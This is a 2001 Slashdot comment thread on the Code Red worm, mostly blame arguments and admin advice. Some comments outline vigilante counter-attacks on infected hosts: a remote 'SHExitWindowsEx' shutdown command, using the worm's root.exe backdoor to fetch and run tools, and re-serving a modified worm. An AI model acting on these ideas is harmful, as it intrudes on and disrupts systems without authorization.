Every time I've shut down Apache for whatever reason or other I've never even had it cross my mind that I should reboot twice or even once to make sure no vestage of it remains. The *ix-ish model of services running in userspace as daemons makes much more sense than the NT-ish every service is either part of the OS or velcro'ed so tightly to it that you aren't sure where one ends and the other begins. I've seen many a Linux box where random stuff has crashed and the console is either dead or covered with error messages but those 10 httpd threads that were there at startup are still firing out web pages if you ask for 'em, and many an NT box where an error caused by IE or the mouse driver effectively takes the rest of the box with it. The standard spec for NT servers where I work appears to include watchdog cards, I think they're called Hangtime (cute name) cards, that're supposed to automatically reboot the server if something bad happens and can accept remote reboot requests even if the OS is hosed. I think they even work once in a while.

Re:That script

[Dahan]

It's a pretty ineffectual script anyways even if it did work right, at least in terms of stopping CR. First it stops IIS, but it doesn't change the service settings to not make it start automatically on boot. Then it (tries to) reboot the machine. Well, if it was successful, IIS would start right back up again, vulnerable as ever. It'd be reinfected in a few minutes.

Actually, it's probably better that it can't reboot--I think just stopping IIS will stop the machine from trying to infect other machines, so things would be okay until the next reboot.

Re:Start blaming Microsoft again

[Cyberfox]

Extremely well put. Thank you for stating it so clearly, and with a minimum of bombast.

Cyberfox!

Red herring story

[jariv]

here.

The Apache save isn't working and here's why...

[gfecyk]

64.221.96.210 - - [12/Aug/2001:00:07:49 -0500] "GET /default.ida?[snip query data] HTTP/1.0" 200 -

That's a snip from my web server log. Granted I'm running Purveyor Webserver and I hacked it to replace .htp with .ida so it will do server side includes.

It DOES launch the SSI scripts when visited with a regular web browser, but the web server never gets around to launching the scripts when Code Red visits it because it closes the connection before the web server can execute the scripts. This is evident after the "200 OK -" line where the "-" means no data was transferred.

Apache might still process the page anyway and therefore launch the scripts, but aside from that I don't know how it gets as far as to run them.

I'm thinking of running a background job to look at the log for /default.ida whenever the log file changes and then launch the scripts at anything that tried to view this page.

Re:Stop blaming microsoft

idq.dll (the bad boy) is an ISAPI handler written in C

And it keeps going

[bonzoesc]

I got this mail, and the problem is that people are WAY TOO STUPID to know what to do. If the microsoft patch can tell if it needs to do anything or not, RR and @home security should point everybody to it.

From: security@cfl.rr.com
To: Our Valued Customers
Subject: Security Notification

ROAD RUNNER ALERT

VIRUS ALERT. YOUR IMMEDIATE ACTION IS REQUIRED.

Dear Road Runner Subscriber:

Road Runner, like many other ISPs and, indeed, the entire Internet, has
experienced an attack on its network that apparently is attributable to a
strain of the Code Red virus. It is possible that this virus has infected
the PCs of Road Runner customers using the Microsoft Windows NT Server or
Microsoft Windows 2000 Server operating systems. Infected PCs may
continue to flood the Internet and the Road Runner network with
virus-generated messages (even without your being aware of it).

Road Runner is working to alert all of its subscribers to this problem
and to instruct them on where to find and install the patch necessary to
eliminate the virus. In the meantime, Road Runner customers may
experience slow network response, flashing data lights on their cable
modems, and other symptoms (such as unusual port scan log activity or
increased firewall activity) while Road Runner and the Internet community
work to control the impact of this virus.

IF YOUR PC IS RUNNING WINDOWS 2000 SERVER OR WINDOWS NT 4.0 SERVER,
PLEASE IMMEDIATELY DOWNLOAD THE CODE RED PATCH FROM MICROSOFT'S WEBSITE
(www.microsoft.com/security) AND RESTART YOUR PC.

IF YOUR PC IS RUNNING WINDOWS 98, WINDOWS 95, OR WINDOWS ME, OR IF YOUR
ARE A MACINTOSH USER, NO ACTION IS REQUIRED ON YOUR PART.

We ask for your patience while Road Runner continues to work with the
Internet community to address this virus.

Thank you.

Road Runner Security

Re:And it keeps going

[Tridus]

No, its not installed by default.

But its so easy to install a trained monkey could do it. In 2k its just "Add/Remove Programs" and hit a checkbox. Its more difficult in NT in my experience, I've had horrible experiences trying to install IIS4 with anything other then SP3 as the current service pack level. IIS4 is also part of the Option Pack, and not included in NT itself (thats IIS2, which afaik is not vulnerable to Code Red).

They should be telling people who are running NT/2k of any variety to install the patch, that would go a lot farther towards solving the problem.

Re:And it keeps going

[reverius]

Actually, the re-booting is quite significant to the process.

The worm only stays resident in memory after you are infected. Therefore, you are instantly clean after a reboot. It _does_ not stay anywhere else except RAM, which is cleared when you reboot.

However, the need for installing the patch is that you will be infected again within minutes (statistically) after the reboot, unless the patch is installed.

Re:And it keeps going

[bonzoesc]

It must not be installed by default - I don't have it in my Services listing. Doesn't matter - if I need serving, I've already got Apache installed.

And no, I don't exclusively use Linux. I *have* to play RollerCoaster Tycoon.

Re:And it keeps going

[RobYoung]

customers using the Microsoft Windows NT Server or Microsoft Windows 2000 Server operating systems.

So I guess the people who are running Windows 2K Pro think they are fine? Windows 2000 Professional includes IIS 5.0. But, it is not installed by default, if I remember correctly.

Re:And it keeps going

Funny, says nothing about linux in there.

Re:And it keeps going

[djocyko]

IF YOUR PC IS RUNNING WINDOWS 2000 SERVER OR WINDOWS NT 4.0 SERVER,
PLEASE IMMEDIATELY DOWNLOAD THE CODE RED PATCH FROM MICROSOFT'S WEBSITE
(www.microsoft.com/security) AND RESTART YOUR PC.


So....let me get this right...I d/l the patch, then I reboot. It seems (RR and) Microsoft finds rebooting to be the solution to everything:

What To Do If You Are Vulnerable?

a. To rid your machine of the current worm, reboot your computer.

then they say...

b. To protect your system from re-infection: Install the patch as specified in the instructions.

At least they got the INSTALL THE PATCH part...heh

That script

[Mike+Hicks]

Unfortunately, I don't think that script will work. I don't have an IIS box to test on, but my NT 4.0 workstation will not shut down with that `rundll32 shell32.dll,SHExitWindowsEx 5' command. I get a dialog box to pop up saying ``Error in shell32.dll Missing Entry: SHExitWindowsEx''

I have a PHP script set up to do a `net send %COMPUTERNAME%'. If I can find an FTP server with Microsoft's new tool, I may start downloading that with an FTP script and running it.

However, I also heard that IIS doesn't run with many privileges at all on Win2k boxes. It may not be possible to do anything at all.

Re:That script

[Mike+Hicks]

Heh.. I never realized that one. Good catch ;-)

I haven't personally tried the `iisreset' trick -- I've heard it doesn't work. Not sure, though.

Re:That script

Not to mention the fact that if the script just shut down IIS, how does it expect to reboot the machine? Could be an either/or situation.

Re:excuse me!

Stupidity by sysadmins + stupidity by Microsoft definitely counts as an MS mess.

Also, if you read above, many victims are not sysadmins but innocent people who thought it would be a great idea to run NT (or the boss thought it would be a great idea).

Seriously, are you blaming all these people for being clueless? I would blame them for being deceived by Microsoft. It seems that NT, 2000, and XP are only safe for diligent, highly experienced, fully qualified professional sysadmins. Do you think that MS planned it this way?

Re:Not the mess they made...

[Shimmer]

Somebody mod this puppy up. W2K is not installed default on W2K Pro.

-- Brian

About time!

[supabeast!]

" it also gives you an option to permanantly disable IIS..."

About time Microsoft showed people how to secure a Windows web-server! Turn off the web daemon! *sigh*

Re:Unforgivable!

Smells trolly. Given the choice between having my machine flood others or be shutdown, I'd rather it be shut down.

I'm guessing you've never been DoS'd? Its easy to make statements like yours when living in lala land.

Re:Stop blaming microsoft

[Trepidity]

If you truly are an NT server admin than I pity you. While you spend half your day researching and applying patches to your servers, BSD and Linux admins get to play around with the really fun stuff.

Hrm, I seem to recall the Morris worm exploiting a Sendmail vulnerability. Patching sendmail hardly seems like "play[ing] around with the reall fun stuff." Not to mention the recent BIND hole...

Re:If you've had a corporate hit on your network..

[GC]

So it probably would be a good idea for anyone to send every host that comes in searching for default.ida at least one reboot command to make sure that patched machines dont bother us again.
The root.exe left in their scripts directory would be their own problem.


No, this is another common misconception. The exploere.exe trojan makes Code Red ][ infected machines survive the reboot.

Also I've seen many people expressing that they could stop the IIS service. I have tried this and it doesn't work.

I've even seen another /. user set up a script to do this automatically. - He/She is using a similar technique to one that I've already tried. For some reason it doesn't work.

Files on an infected machine, can be accessed via the http://lusers.ip.net/scripts/root.exe, but there are restrictions as to what you can do.

The infected machines are Win2k (ie WINNT based) - if they're running NTFS then there are specific permissions on the file directory structure. I believe that this restricts what you can do with root.exe.

Re:If you've had a corporate hit on your network..

[nick-less]

Then there is a nice little Vulnerable Server Scanner Provided by the people at www.eeye.com.

Did you ever check some infected machines that hit you log's with this tool? I tried and lots of them where found as "unvulnerable". So better don't trust it to much ...

Comment removed

[account_deleted]

Comment removed based on user account deletion

Paid Bashing

"My job is programming Windows boxes, so no, I'm not a paid basher."

You merely make a living off of MS shortcomings, then. Because your income depends on MS products, you won't use better tools. And the more your servers crash, the more it proves your support staff is needed...

Re:Paid Bashing

[sqlrob]

Unless of course, I'm someone with ethics.

Sorry to disappoint, but I try my best to make sure support for my code isn't needed. And I use the tools I need for the job, which often means writing my own.

And define "using better tools". If I write stuff for Windows shops that are unwilling to change to something else, what is a better tool? If I get what I need done with as much stability as is possible on the platform, rapidly, and to spec, what is wrong with my tool choice?

Re:Stop blaming microsoft

Granted, it is quite easy to create a malacious program in C. However, these exploits are known since the 70's. Numerous tools are available to deal with these issues (like eg ElectricFence). And if you like to do it yourself: it's not that difficult. If you need a 'low level language', deal with it correctly.

Re:Liability for software defects

[norton_I]

There is a big difference between an "normal" EULA and the GPL:

The GPL grants you the privlege of copying, redistributing, and making derivitive works of copyrighted material, in exchange for agreeing to certain provisions. You only need to agree to the GPL if you want to do one of the above. When you buy GPL software, you are buying the software. If you so choose, the GPL provides you with a superset of the rights you atomatically get by buying a copy.

"normal" EULA's attempt to specify how you can and can't use the software in any case. They claim that you haven't purchased a copy, and you don't have the right to use the software as you wish.

Whether the courts would choose to recognize this distinction depends on how much corporate america bribes them.

In any case, this has no direct bearing on the liability issue.

Re:Not the mess they made...

[Sethb]

Looking through my logs, I think it's more likely that it is home users that are infected now, a lot of DSL users on dynamic IP addresses are hitting me.

I haven't seen it posted here on Slashdot yet, but there's a neat little Java Applet (it's even GPL) over at:

http://www.dynwebdev.com/codered/

It auto-replies to any machine that tries an .ida exploit against you, popping up a Net Send message on the computer, so hopefully someone will notice and patch the machine...

excuse me!

[gvsu_snow_lord]

But since when does stupidy on sys admins part count as a MS mess? Im sorry but all software has bugs. MS posted a fix for the exploit and few sys admins used the patch. Then came Code Red, now Code Red II and III. (BTW I am not a MS user at all) The 'Mess' came from the lazy sys admins.

Now I have a question. All your running a server and have logs of attempted infections why not do the community some good, socker here your actuallg going have to do someting helpful... unheard of for linux users, take out your logs and and track down the sys admin for the servers who tried to infect you. Then let the sys admin know they have code red. Maybe the sys admins think they don't have the problem, or maybe if they get enough email they will take action.

Just do something other than mocking!

Re:excuse me!

[gvsu_snow_lord]

I would then blame the brain dead fool who run NT, 2000, ect. they want to run the OS for some reason. They should then deal with the mess they wanted.

The clueless people must read the news paper, watch cnn, read online news, listen to the radio. I can excuse ingorance once. After that people have to own up to their mistakes... like not installing the patch after the first out break. Like no listing when the govt and ms heald a press confrence to pleade with people to apply the patch.

You missed the point

[ZxCv]

I'm not saying that every crash or whatever is the fault of 3rd-party drivers. I'm saying you're probably just as likely to experience a crash due to a problem in Windows as you are to experience a crash due to a faulty driver of some sort.

Leter from MS:

[djocyko]

From: Support@iis.microsoft.com
To: Registered_Users@iis.microsoft.com
CC:
Subject: RE: IIS Code Red Worm Patch
Attachment: Instructions.doc
Body:

Hi, how are you?

We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructionsin a easy to read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.

If you have any advice on this file, please email us back!

See you later!

Microsoft Assumes...

[Greyfox]

That someone clever hasn't already written a bit of code that goes through their web logs and installs back orifice on all the compromised systems that have tried to scan them (over 3500 since last saturday, here.)

Once your system has been compromised in this fashion, the only way to be sure is fdisk, format, and reinstall.

rude link on main page.

[jeffehobbs]

Linking to a page that could potentially shut down/restart your machine without warning is rude, virus or not.

~jeff

Re:rude link on main page.

[Dahan]

There is no way for that link to shut down or restart your machine. If you look at the script, it just prints a message if you link to it as default.ida. You have to have a query string for it to attempt to shut down IIS. And how's it gonna reboot your machine anyways, if it's already shut down IIS? That script obviously hasn't actually been tested :) (and it's not like it'd be terribly difficult to test if you had a NT box around... put IIS on it and wait a couple of minutes and I'm sure someone'll send it Code Red. Set your firewall to block outgoing packets on port 80 from that machine so it won't infect other machines).

Re:rude link on main page.

Here we go again.. Ever been DoS'd? No? I didn't think so.

If someone was pointing a gun at your friend, would you just stand by and not attempt to help your friend? We're all friends here and we're all being shot at.

Re:rude link on main page.

[CentrX]

Right, and allowing your machine to attack other machines is downright KIND!

Re:Stop blaming microsoft

[Crixus]

I agree with you not to blame MICROS~1. Blaming them is like blaming a glass manufacturer for when a robber breaks a window, and steals your tv. Blame the damn virus writer! And blaming the sys admins is like blaming the owner of the house because he/she does not know that the glass they bought with the house is NOT bullet proof.

No, no, no.

When you buy a house, you know for a FACT that glass will break when hit with a hammer.

The people who buy MS products THINK they're getting something secure, since it's one of the many buzzwords (READ: lies) that MS always uses.

Your analogy just doesn't do justice to the situation.

Rich...

Re:Not the mess they made...

[mpe]

Code Red is not the problem, it is the symptom. If Microsoft had fixed the problem before there was a problem, then the buggy version of IIS never would have shipped.

However part of the problem is the use of huge monolithic programs, which attempt to do everything including the "kitchen sink". For quite a while with Windows we have been seeing what amount to explots through "bells and whistles". Frquently where most people don't even know something is even there...

Only gets SOME of 'em.

[Ungrounded+Lightning]

OK, who can write a perl CGI script that will, on connection from an infected host, send the appropriate commands to root.exe; download the tool; and run it?

That only works if the server is infected by the version that installs the trojan.

With a little more work one could take advantage of the fact that being infected by any version of the worm shows the server is vulnerable to the original buffer-overflow attack. So one could:

Get a copy of the worm.

Modify it to take the web server down (or whatever) rather than infecting it.

Install a launcher for it as default.ida in the document root of your webserver.

Note that by now any worm-infested machine - benign or backdoor version - may have several diverse rootkits installed. So it should be reinstalled (preferably with linux or a BSD and apache B-) ) rather than cleaned out and patched. And a machine infected with the benign worm, if merely crashed, will no doubt be brought back up and eventually infected with the backdoor-installing version.

Some authors of retaliatory-strike software will no doubt chose to disable the web server on a more permanent basis - as by removing the unpatched DLL (along with the several backdoors the worm installs - see a patch tool here) - rather than merely shutting it down.

While this may get them in trouble, chosing to reformat the drives would be a hostile action, since it might destroy unbacked parts of the web site. (It would also likely lead to the administrators installing a backup, complete with vulnerability. So it is a less effective retaliatory strike.)

Finally: I do NOT recommend actually doing this, as it may be illegal. The more damaging alternatives certainly are illegal (and also unnecessary, given the availability of less damaging alternatives).

Re:Dumbest thing they could do

[PurpleeDragon]

Why post crap like this .. This is what i mean .. THE REINSTALL IDIOTS. the new MCSE/whatever people have spoken. Instead of figuring out what they did and correct it , they say reinstall. YOU all need to get some education, Your reinstall skill high enouf learn how to fix this shit,. GOD you worked at my company, Id fire your ass. FAST. reinstall pfffft.. Do you reinstall your house once it became comparmised? NO you figure out what happened and then fix that . Oh i am sorry, i forgot , all you low educated people JUST REINSTALL. If a script kiddie installs another backdoor you take it out. but that might require some real Administration work . So all, you idoits just reinstall. lol what a joke this enviroments becoming. NO wonder there are 9 millions expliots on NT , There are 9 million idiot administrator behind it.

Re:Warhol Worm proposed: 15 minutes to total infec

[cybersquid]

Don't feel bad. In a few days, someone else will post this story and it will be accepted.

That's what always seems to happen to me.

Blame everyone bigger than you.!

[tcc]

I like that attitude (well, I don't). On one side people want to have their freedom and do whatever they want and hack their way in an OS, on the other side they want it to be perfect no bugs no loopholes no errors, and if there is, almost autopatching themselves.

Fact #1: the world is full of clueless morons that will open any attachement they see because they see "click". EVEN IF YOU TELL THEM NOT TO DO IT.

Fact #2: If this virus would have hit linux, or apache... people wouldn't have made such a big deal about it. Granted that Linux WWW administrator normally are more responsible towards their servers and patching it at the sign of a problem...

but what does have to do with the company itself? it's not microsoft's fault if their userbase are composed of clueless morons... Yes I can't bare the fact that *OVER ONE WEEK* later, some servers are still popping my light like if nothing was publicised.. I can't understand how people can be that selfish and ignorant, but is that microsoft's fault?? THE PATCH WAS AVAILABLE *BEFORE* this virus got out!

I don't like microsoft more than the average joe here, but what I hate even more is people bitching immaturely at every occasion they can get, making "bitching against microsoft" like a crying baby after 2 years.... you get used to it and it doesn't matter anymore... and that's not the effect it should have, now people yell on roofs "microsoft this microsoft that" and nobody listens! Why? simple... it's called credibility folks!.

Re:Blame everyone bigger than you.!

[mpe]

Excuse me, but out of curiosity, what does the concept of 'iis exploits' have to do with code red? Code red does not exploit IIS. Code red exploits index server.

You get this automatically with IIS, indeed you have explicitally turn it off.

You could configure apache to use index server

But it dosn't do it by itself!

Re:Blame everyone bigger than you.!

[mpe]

It also goes without saying that any product marketed primarily to morons must be foolproof and robust to the most extreme extent possible. Does IIS qualify here?

Does any part of Windows qualify?

All the difficult bits should have warning messages at install time, similar to the warnings on cigarette packages, or the warnings on drug packages against dangerous interactions, knowing full well that products may be used by a moron.

Or even like the "cartoon" style warnings you find on domestic appliances. Together with "refer all servicing to qualified personnell". Problem is the latter is likely to be easier with something more like unix (or even VMS) than any version of Windows :)

Re:Blame everyone bigger than you.!

[Tony-A]

it's not microsoft's fault if their userbase are composed of clueless morons...
When Microsoft has a monopoly on PC Desktops, it is Microsoft's fault. When that monopoly is used to spread into other areas, it is Microsoft's fault.

Re:Blame everyone bigger than you.!

[SuiteSisterMary]

Excuse me, but out of curiosity, what does the concept of 'iis exploits' have to do with code red? Code red does not exploit IIS. Code red exploits index server. You could configure apache to use index server, I'm sure, and then code red would *gasp* AFFECT APACHE! By your logic, at least.

Re:Blame everyone bigger than you.!

[rambot]

You're talking but your not saying anything. We all know M$ sucks. We all know there are tons of M$ server admins who are idiots. What WE are bitching about is how WE are helpless to the degredation of the quality of the internet thanks to the ignorance of said parties! What WE are bitching about is how M$/IIS has more exploits found in 6 months than xNIX/Apache has in its entire existence. Why? simple..it's called M$ sux0rz folks!.

What I'd like to see...

[abischof]

I'd be interested in seeing how the sales of Code Red have correlated with the public's awareness of Code Red.

Re:What I'd like to see...

[caferace]

Look no further then: "Code Red soda bubbling away"

Re:What I'd like to see...

[cybermage]

Hmmmmm.... almost makes you wonder about the source of the worm.

<comic store guy>Best marketing campaign, ever.</comic store guy>

Dumbest thing they could do

[Talla]

When a box has been cracked, you need to do a complete reinstall, as you can never know what backdoors has been installed. Sure, you can remove RCII, but while it was active, it would only take even the dumbest script kiddie a couple of requests to install another backdoor.

Re:Dumbest thing they could do

[Trepidity]

I still think it's better than nothing - many people simply *won't* wipe and reinstall, especially if it's not a corporate server, but just a small personal website in which security isn't exactly the number one concern. At least this tool will do a more thorough job than the manual attempts to clean up that would've happened otherwise.

Re:Dumbest thing they could do

[snake_dad]

And, depending on how much ethernet snooping the rooted box can do, change all passwords that may have been seen on that segment, and the passwords of the machine itself. The password database might have been taken as well. Maybe this will not affect a webserver, but the same passwords might be used on other machines and/or services. No backdoors necessary...

Re:Dumbest thing they could do

[GrumpyOldManager]

You are absolutely right. This tool probably couldn't detect secondary changes made to the machine's binaries.

We have a policy of formating the hard drive and reinstalling the OS once a machine has been compromised. This policy applies to any OS we run. To make it easy we've automated the process. To test the process we reinstall all of the machines on a regular basis, even servers. We spent some time years ago convincing vendors like RedHat that this was a useful thing (think jumpstart).

Re:Here's how open source would be better...

[reflective+recursion]

These are not facts. Where is your evidence? Sources? Where?

Sure everyone has access to the source code. But you forgot one important detail: not everyone is a programmer. It does not matter a single iota whether grandma has access to the source code or not. It does matter that she has secure software.

Fact: that "people with infected IIS are not admins" is irrelevant.

No it's not. I was pointing out that people with the virus are ignorant end-users. Not the technical elite who know what source code is and what to do with it. Your quote about Microsoft's market position is what's irrelevant.

You seem to have missed the issue totally. I am not arguing Microsoft has secure software. I am arguing proprietary software does not equal insecure, and open source does not equal secure. That is all. I am not defending Microsoft in the least. What I am defending is the numerous secure proprietary software out in the world. From small software shops to large corporations. From decades past to decades in the future.

Fact: While it is indeed not always true that people are paid to fix free software, the exact same thing is the case for proprietary software.

If the software shop refuses to fix a security problem then you look like a complete dumbass to continue to use their software. Do yourself a favor and get a vendor who cares. I'm assuming you live in America and buy into the idea of free market. If you do not agree that the market is regulated by consumer demand, then you are complaining in the wrong forum.

Whereas, if Microsoft decides, as it surely will down the road, to stop paying its programmers to fix IIS, or Windows 2000, or DOS 5.whatever, you'll be out of options if you have failed to follow the M$-recommended upgrade path.

I'm sorry to hear that. Buy a new computer, perhaps? One that can run the newer software. Again, you are bashing Microsoft with "M$." Lets not throw jealousy into the argument. Everyone knows Microsoft has money, why keep repeating it.

Fact: Red Hat does not, and has never, represented the security-conscious administrator's #1 choice for a default system installation of GNU/Linux.

And what, the original poster gets away with implying Microsoft is representative of the security-conscious? Come on now, no double standards. I also never said Red Hat was the #1 choice for the security-conscious. I could just as well argue against Slackware, which is updated very rarely (which the original poster understood as a sign of security).

Challenge: name three vendors from which you can obtain the Microsoft Windows 2000 or Windows NT kernel in a distribution as fundamentally different from Microsoft's as Debian's, or SuSE's, is from Red Hat's.

Challenge: name one vendor who will sell me a Honda Accord 2001 other than Honda. No. That is a Ford Taurus, and my what a piece of shit it is.

Okay, this is just too irrelevant in the discussion of security. I'm not arguing for bloat or any of that intellectual property nonsense. This issue at hand is security. I say the open source system does not produce software that is more secure than proprietary. Likewise, proprietary can be very insecure compared to certain, specific, open source software packages. Your lesson for today: learn there are other proprietary software vendors than Microsoft. I was only using MS because this thread is about their product specifically. The original poster implied that OS was inherently more secure than proprietary, and I still refuse to accept his or your reasoning.

Re:Not the mess they made...

[Swami]

I for one expect use of IIS to drop as a consequence of the Code Red...

Well, we can just have a look at http://netcraft.com/survey/ over the next few months to see if you are right. But that isn't the current trend. I for one wonder whether customers of Netcraft's security services are getting their money's worth.

Re:Not the mess they made...

[NeoMage]

Hahah, that IBM guy is now on "the hit list".

Re:Warhol Worm proposed: 15 minutes to total infec

Prediction: before the year is out, you will see a "worm kernel" that incorporates thought-out techniques like this, with a modular interface for plugging in the latest exploits.

At that point, all you will need to do is take the latest remote-exec exploit, put a wrapper on it so it can talk to the worm kernel, and package it up.
You might have to write your own interesting payload to actually do the auxiliary stuff ("hacked by chinese"), but I imagine dedicated black hat types will have a few things ready to go at all times.

Once this becomes as common as the virus creation lab (chiba city!), the time to infection after something new gets posted to bugtraq will become unbelievably small.

Re:Stop blaming microsoft

[uchian]

Remember that in C you have pointers as well as arrays, and that they are pretty much interchangeable.

Not only would you have to keep an eye on if a pointer is in a viable array or not, but how about if it moves to dynamically allocated memory? Could still be valid, but how are you going to check efficiently every time a pointer is accessed? How about if a pointer is of type char, and it moves into a memory area that has been allocated as type float? Should this be an error? How about if the programmer wanted to do this?

Me thinks that adding bounds checking to C would be more expensive than you think.

And rememebr, off screen bitmap drawing makes great use of pointers and arrays, and because bounds checking effectively removes the programmers ability to specify when checks should happen, they would happen whenever they _might_ be necessary - i.e. a lot of them would be redundant. All of this happening in the innermost loops of your bitmap drawing routines.

now _that_ would be slow!

EXACTLY [Re:Why no lawsuits?]

[rm3friskerFTN]

As I posted earlier [strange ... did someone "astroturf MOD" it to -1?]

QUESTION: If Joe/Jane Consumer running whatever OS/Apps that exist suffered as a result of the Microsoft Code Red I & II Worm can he/she sue Microsoft for losses???

IMPORTANT NOTE: Joe/Jane Consumer did NOT sign/accept/whatever an EULA associated with Microsoft Web Server. Joe/Jane was just "harmed" by the poorly designed, fault ridden, Microsoft Server Software. Joe/Jane NEVER signed/accepted/whatever the EULA associated with the poorly designed, fault ridden Microsoft Server Software.

Re:Stop blaming microsoft

[ZxCv]

I really figured this to be a joke and therefore, this guy to be a programmer (or at least mildly familiar with C)...

Re:FUD ALERT

[sqlrob]

An attacker would have to already have access to the machine in order to exploit the broken sequencing.

No, they'd need access to the subnet, not the machine. The security issue isn't with the machine that was patched, but the machines it communicates with

There's also a 6a, which is why I wasn't sure whether it was 5 or 6.

I don't know how much the issue is "new security holes" from the patch but "will it still work?". Look at 5->5a, 6->6a, DX8->DX8a, 3(!) attempts to fix that hole in Exchange, etc. Every MS patch needs to be regression tested on a non production box before being really attempted. It's too dangerous to do otherwise. It's also too dangerous not to immediately patch now as well. SNAFU.

Re:Not the mess they made...

I would disagree... not all 'admins' had the proper information given to them in a timely manner for them to patch. It's a backdoor (one of many I might add) that Microsoft has decided to leave unchecked and unpatched for some time. They've done this numerous times... don't overlook the past OS's they've released with poor port security. Microsoft is just a poor developer. Why should the people running the software do the work? It's something that should have been addressed long before it became a problem of this magnitude. Of course, anyone who knows wouldn't be using a Windows product as their webserver (except for poor hapless home users), but these are issues that MS should be fixing... and they never do... one of these days Microsoft WILL pay for their poor products.

They might as well call it AOL...

It's a little late. They certainly waited long enough for AT&T to use it as an excuse to permanently cripple my cable modem. What can I possibly do, I'm too far away from the CO for dsl, and it costs almost twice as much.

Does blocking incoming 80 even slow this crap down? The AT&T cable modem network must have reached saturation almost immediately... so it's not like they can protect "those who haven't got it yet". And those still infected, will attack other networks one out of eight times. Until some dufus of an engineer is inspired to block outgoing port 80, that is...

Running it Scared

[newimprovedmedia]

This silly post really needs no reply, reading it is enough to argue against it.

The GPL GNU license is the real strength behind Linux.

I think everyone would agree that MS is afraid of the Free Software Foundation.

It is true that no OS runs itself, and that system administration is partly to blame, but if this software were created in an open environment the weakness would have been spotted earlier. much earlier.

It is the attitude of computer users who want to make a better OS and share the information with the world, instead of making a lot of money, that scares a company that considers it OS - private property.

Power to the people!

Re:Stop blaming microsoft

> The released a patch well before Code Red. Get over it.

Sure, it's not Microsoft's fault that their products continue to facilitate the spread of worms written by scr1p7 k1dd13z. It's not their fault that their own servers got infected with Code Red, well after it was known to them AND the general public.

Obviously some blame lies with the system administrators, who are running NT systems and don't even think to patch their systems to protect against well-known exploits like Code Red. But you have to admit that there is something really wrong when a company like this has so many humiliating situations occur because of its products, even within its own damn company.

Microsoft can't even run some of its services on its own software, and instead relies on BSD or other evil technologies.

Nah, let's not blame Microsoft or its products for these situations. It must be because of something else.

Stop blaming microsoft

[MeowMeow+Jones]

Blame the creators of C.

They're the ones who are responsible for buffer overflows.

Re:Stop blaming microsoft

[wadetemp]

Quite wrong. Yes, you know your house can be broken into, no matter how much the realtor insists that it's a safe neighborhood, that the alarm works well, etc. As a homeowner it's still your responsibility to take steps to ensure that your house doesn't get robbed. You test your locks, your alarm. You buy insurance just in case something does happen. Read: you are not an idiot. But as a homebuyer you still have to accept that fact that ANY home can be broken into... no home can be made well enough that it can NOT be broken into.

The sysadmins didn't test the lock, didn't buy insurance... they just took the realtor at his word. The only ones with responsibility for a resulting break-in are the owner of the system and the criminals who break in. It has little to do with the house, because houses can be broken into. And so can (any, not just MS) complex software.

Re:Stop blaming microsoft

Go away and come back when you get a sense of humor.

Luser!

Re:Stop blaming microsoft

[SuiteSisterMary]

*Sigh* No shit, eh? What say we go start a Slash-based site for NT called 'backslashdot.org?'

Re:Stop blaming microsoft

, the bug MS left in their code could have been easily made by any programmer

Exactly

Re:Stop blaming microsoft

[ClosedSource]

Your absolutely right.

The reason that some slashdot posters don't want to blame the virus writer is because they're quite happy with Code Red because it makes MS look bad. The enemy of their enemy is their friend .. At least until their ports get blocked by their ISP.

Re:Stop blaming microsoft

[tswinzig]

The people who buy MS products THINK they're getting something secure, since it's one of the many buzzwords (READ: lies) that MS always uses.

The only people that think they are getting something secure when they buy/download any operating system are the unwashed masses. The ones that don't know any better. These are the same people that allow the Code Red-style worms to spread.

The rest of us applied the patch supplied by Microsoft more than a month before CR came out...

You see, as an admin in charge of machines running IIS and other Microsoft software, I am subscribed to several alert lists, including Microsoft's security list. And when Microsoft releases a patch for anything that can be used to "arbitrarily execute code of the attacker's choice" on a port not blocked by my firewall, I immediately install that patch. The end.

I'm so sick of people blaming Microsoft. The released a patch well before Code Red. Get over it.

Re:Stop blaming microsoft

[Bryan+Andersen]

Actually IIS is written in Visual C++. Blame M$, they left the buffer overflows available to use in the C++ libraries.

I rarely use C's or C++'s overflowable library routines. If I do it's only in a quick hack. One dosen't need to use the standard library routines.

Re:Stop blaming microsoft

[Felinoid]

When you buy a house, you know for a FACT that glass will break when hit with a hammer.

Windows is sold as shatter proof glass..
This means it will not break.

Linux is sold as theft resistent..
This means it can break but it's difficult to gain entry..

Microsoft says:
When Windows breaks "well all software breaks"
When Linux breaks "See it breaks.. everyone breaks..."

Linux says:
When Windows breaks "Where is the patch?"
When Linux breaks "Here is the patch"

Security experts say:
"Get the operating system patched ASAP..
If you have the source code.. fix it yourself NOW don't wait for an offical patch"

Microsoft security experts say:
"Wait for an offical patch.. don't do it yourself"

RL security experts say:
"Fix it now.."

RL theafs say:
"BWAR.. Break Window And Run.... thwarts any security system....
Wait a while. If they don't fix the window quickly they'll soon forget...
Once they relax.. walk in the openning and walk out.." (taken from a 1980's text file on how to steal...)

From TV:
"We have to wait for Microsoft to relase a patch and then we have to test the system to be sure it works correctly and all the apps continue to work correctly." - Microsoft certifyed System admin being interviewed by a reporter...

Re:Stop blaming microsoft

If the god has a defect that often leads to the creation of violent humans, then ya i would say the god is responsible.

Re:Stop blaming microsoft

[Capt.+Beyond]

You people are still ignoring the plain fact that the virus writer is in fact, the one to blame.

Re:Stop blaming microsoft

[ToasterTester]

Actually blame bad SysAdmins and they are platform indepentdent. If NT SA's had done thier job and were up to date on their patches Code Red would of been a moot point. And don't say stupid NT SA, because there are as just many bad Linux admins with unpatch well know exploits. Incompetence is platform independent.

Re:Stop blaming microsoft

[Cubist.Priest]

That's silly! I hope you're not serious.

Re:Stop blaming microsoft

[jeffy124]

Alright, that's crossing the line. Thousands (perhaps millions) of applications have been written in C without trouble before. I beleive you are not a programmer who is aware of how good a language such as C is in the long haul.

Personally, the bug MS left in their code could have been easily made by any programmer, it just happened that this (very easy to fix) bug exisisted in a high-profile application and also opened up the ability to run arbitrary code on an IIS server, giving a path for Code Red to operate with.

Re:Stop blaming microsoft

yes, and stop blaming humans for starting wars, because god created humans.

So obviously god is responsible.

Re:Stop blaming microsoft

[greenrd]

Thousands (perhaps millions) of applications have been written in C without trouble before.

So? Thousands of C applications don't listen on network sockets at all. Of the ones that do, many of them are too unpopular to be considered as candidates for cracking attempts.

Personally, the bug MS left in their code could have been easily made by any programmer

